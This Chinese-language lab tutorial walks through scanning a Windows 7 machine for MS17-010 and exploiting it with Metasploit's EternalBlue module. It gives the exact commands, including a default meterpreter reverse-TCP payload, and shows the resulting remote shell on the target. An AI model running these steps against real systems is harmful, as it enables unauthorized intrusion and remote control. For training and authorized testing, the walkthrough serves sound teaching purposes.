Kali渗透测试:使用工具Metasploit攻击操作系统(二)

简介: Kali渗透测试:使用工具Metasploit攻击操作系统(二)

接上文 Kali渗透测试:使用工具Metasploit攻击操作系统(一)https://developer.aliyun.com/article/1618443

实验环境
攻击机:Linux kali 5.10.0 IP : 192.168.68125

靶 机:Win7 IP : 192.168.68.159

步 骤

  1. 启动Metasploit,加载检测脚本
    确定目标系统是否存在MS17_010漏洞,输入如下命令:
msf6 > use auxiliary/scanner/smb/smb_ms17_010

使用smb_ms17_010对目标进行扫描,命令如下:

msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.68.159
rhosts => 192.168.68.159
msf6 auxiliary(scanner/smb/smb_ms17_010) > run

结果如下图所示:

图中显示“Host is likely VULNERABLE to MS17-010!”,可以判断存在该漏洞。

2. 查找MS17_010漏洞渗透模块
输入如下命令:

msf6 auxiliary(scanner/smb/smb_ms17_010) > search ms17_010

查找到的MS17_010相关模块,如下图所示:

这里我们选择编号为0的exploit/windows/smb/ms17_010_eternalblue。这个模块可以成功的对64位的Windows7和Windows Server 2008进行渗透,其他系统可能会导致目标主机蓝屏或无效。

3. 启动MS17_010模块
在Metasploit中使用use加上模块名启动该模块,如下命令:

msf6 > use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp

启动模块后,使用show options命令查看这个模块需要设置的参数:

msf6 exploit(windows/smb/ms17_010_eternalblue) > show options

命令执行后显示设置的参数如下图所示:

image.png

  1. 参数RHOSTS 赋值
    上图中箭头所指RHOSTS参数是指目标主机的IP地址,也就是靶机Win7的IP地址。使用set加上参数名称空格加上IP,命令如下:
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.68.159
RHOSTS => 192.168.68.159

至此,我们已经完成了ms17_010_eternal模块的全部设置。

5. 进行攻击,执行run

msf6 exploit(windows/smb/ms17_010_eternalblue) > run

image.png

从上图中看到,攻击成功。接下来可以在目标主机上运行一些命令,如dir查看文件,可以对照靶机系统文件夹,如下图所示:

image.png
image.png

演示完毕,欢迎点赞,收藏和转发!

相关文章
|
7天前
|
Java 测试技术 API
自动化测试工具集成及实践
自动化测试用例的覆盖度及关键点最佳实践、自动化测试工具、集成方法、自动化脚本编写等(兼容多语言(Java、Python、Go、C++、C#等)、多框架(Spring、React、Vue等))
37 6
|
1月前
|
前端开发 Java jenkins
Jmeter压力测试工具全面教程和使用技巧。
JMeter是一个能够模拟高并发请求以检查应用程序各方面性能的工具,包括但不限于前端页面、后端服务及数据库系统。熟练使用JMeter不仅能够帮助发现性能瓶颈,还能在软件开发早期就预测系统在面对真实用户压力时的表现,确保软件质量和用户体验。在上述介绍的基础上,建议读者结合官方文档和社区最佳实践,持续深入学习和应用。
467 10
|
2月前
|
敏捷开发 运维 数据可视化
DevOps看板工具中的协作功能:如何打破开发、测试与运维之间的沟通壁垒
在DevOps实践中,看板工具通过可视化任务管理和自动化流程,提升开发与运维团队的协作效率。它支持敏捷开发、持续交付,助力团队高效应对需求变化,实现跨职能协作与流程优化。
|
3月前
|
数据可视化 测试技术 Go
Go 语言测试与调试:`go test` 工具用法
`go test` 是 Go 语言内置的测试工具,支持单元测试、基准测试、示例测试等功能。本文详解其常用参数、调试技巧及性能测试命令,并提供实际项目中的应用示例与最佳实践。
|
2月前
|
人工智能 数据可视化 测试技术
UAT测试排程工具深度解析:让验收测试不再失控,项目稳稳上线
在系统交付节奏加快的背景下,“测试节奏混乱”已成为项目延期的主因之一。UAT测试排程工具应运而生,帮助团队结构化拆解任务、清晰分配责任、实时掌控进度,打通需求、测试、开发三方协作闭环,提升测试效率与质量。本文还盘点了2025年热门UAT工具,助力团队选型落地,告别靠表格和群聊推进测试的低效方式,实现有节奏、有章法的测试管理。
|
11月前
|
安全 网络安全
Kali渗透测试:使用Armitage扫描网络
Kali渗透测试:使用Armitage扫描网络
201 3
|
11月前
|
安全 Linux 网络安全
Kali 渗透测试:基于结构化异常处理的渗透-使用Python编写渗透模块(一)
Kali 渗透测试:基于结构化异常处理的渗透-使用Python编写渗透模块(一)
181 2
|
11月前
|
Python Windows 网络安全
Kali 渗透测试:基于结构化异常处理的渗透-使用Python编写渗透模块(二)
Kali 渗透测试:基于结构化异常处理的渗透-使用Python编写渗透模块(二)
194 2
|
11月前
|
Java 网络安全 Windows
Kali渗透测试:使用 Armitage生成被控端和主控端
Kali渗透测试:使用 Armitage生成被控端和主控端
142 2
|
9月前
|
Linux Shell 网络安全
Kali Linux系统Metasploit框架利用 HTA 文件进行渗透测试实验
本指南介绍如何利用 HTA 文件和 Metasploit 框架进行渗透测试。通过创建反向 shell、生成 HTA 文件、设置 HTTP 服务器和发送文件,最终实现对目标系统的控制。适用于教育目的,需合法授权。
254 9
Kali Linux系统Metasploit框架利用 HTA 文件进行渗透测试实验

推荐镜像

更多